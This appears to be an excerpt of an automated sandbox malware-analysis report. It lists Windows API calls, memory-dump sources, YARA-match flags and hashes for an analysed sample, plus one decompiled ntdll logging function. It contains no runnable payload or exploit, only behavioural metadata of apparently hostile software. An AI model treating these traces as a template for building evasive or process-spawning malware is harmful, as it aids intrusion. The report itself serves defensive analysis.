                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00133546,?,00133CBF,00133CBF,?,00133546,?,?,?,?,?,00000000,00000000,?), ref: 001388CD
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123B93), ref: 0013890D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateFree
                                                                            • String ID: .z`
                                                                            • API String ID: 2488874121-1441809116
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 00137398
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 00137398
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123B93), ref: 0013890D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001272EA
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0012730B
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00129BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001389A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001389A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00129BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0012CD00,?,?), ref: 0013745C
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00133546,?,00133CBF,00133CBF,?,00133546,?,?,?,?,?,00000000,00000000,?), ref: 001388CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0012CFD2,0012CFD2,?,00000000,?,?), ref: 00138A70
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00127C93,?), ref: 0012D46B
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00127C93,?), ref: 0012D46B
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            C-Code - Quality: 53%
                                                                            			E0446FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                            				void* _t7;
                                                                            				intOrPtr _t9;
                                                                            				intOrPtr _t10;
                                                                            				intOrPtr* _t12;
                                                                            				intOrPtr* _t13;
                                                                            				intOrPtr _t14;
                                                                            				intOrPtr* _t15;
                                                                            
                                                                            				_t13 = __edx;
                                                                            				_push(_a4);
                                                                            				_t14 =  *[fs:0x18];
                                                                            				_t15 = _t12;
                                                                            				_t7 = E0441CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                            				_push(_t13);
                                                                            				E04465720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                            				_t9 =  *_t15;
                                                                            				if(_t9 == 0xffffffff) {
                                                                            					_t10 = 0;
                                                                            				} else {
                                                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                            				}
                                                                            				_push(_t10);
                                                                            				_push(_t15);
                                                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                            				return E04465720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                            			}











                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0446FDFA
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0446FE2B
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0446FE01
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                            • API String ID: 885266447-3903918235
                                                                            • Opcode ID: b6886bd982c9d04834939a21fd6b9ea34fb4d5be972c8b09e120f86d4b0d5abb
                                                                            • Instruction ID: 599ec39127fc14e1220557ff3599bdcd52e2c9497d55b76ce2b338e130095068
                                                                            • Opcode Fuzzy Hash: b6886bd982c9d04834939a21fd6b9ea34fb4d5be972c8b09e120f86d4b0d5abb
                                                                            • Instruction Fuzzy Hash: 73F0C232640601BBEB201A46EC02E23BF5AEB44730F14421AF668565E1EA62B82097A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%